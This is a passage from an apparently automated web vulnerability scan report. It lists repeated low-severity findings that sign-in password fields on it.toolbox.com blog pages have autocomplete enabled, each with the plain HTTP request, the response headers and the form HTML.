Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67441
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Does John S
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.31. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/dx3-data-driven-decisions-41860

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/dx3-data-driven-decisions-41860 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73174
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Dx3: Data D
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/dx3-data-driven-decisions-41860" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.32. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/elementary-school-and-saas-38160

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/elementary-school-and-saas-38160 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70278
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Elementary
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/elementary-school-and-saas-38160" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.33. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/it-starts-with-data-40018

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/it-starts-with-data-40018 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72957
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   It Starts W
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/it-starts-with-data-40018" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.34. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/key-success-factorswho-needs-em-42168

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72699
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Key Success
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/key-success-factorswho-needs-em-42168" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.35. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/life-cycles-40815

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/life-cycles-40815 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68279
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Life Cycles
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/life-cycles-40815" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.36. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/making-the-case-43129

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/making-the-case-43129 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Making The
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/making-the-case-43129" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.37. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/micracle-free-37832

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/micracle-free-37832 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66943
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Micracle Fr
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/micracle-free-37832" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.38. http://it.toolbox.com/blogs/ppmtoday/monthly/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/monthly/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/monthly/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50524
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/monthly/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.39. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/plowing-sideways-43376

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/plowing-sideways-43376 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Plowing Sid
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/plowing-sideways-43376" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.40. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/roadmap-process-38207

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/roadmap-process-38207 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Roadmap Pro
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/roadmap-process-38207" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.41. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/saas-marches-on-38509

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/saas-marches-on-38509 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SaaS marche
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/saas-marches-on-38509" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.42. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/talent-curves-40195

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/talent-curves-40195 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85703
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Talent Curv
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/talent-curves-40195" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.43. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/technical-debt-revisiited-38720

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/technical-debt-revisiited-38720 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75502
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Technical D
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/technical-debt-revisiited-38720" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.44. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69302
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Check B
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.45. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-emergent-comedy-39924

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/the-emergent-comedy-39924 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68773
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Emergen
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/the-emergent-comedy-39924" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
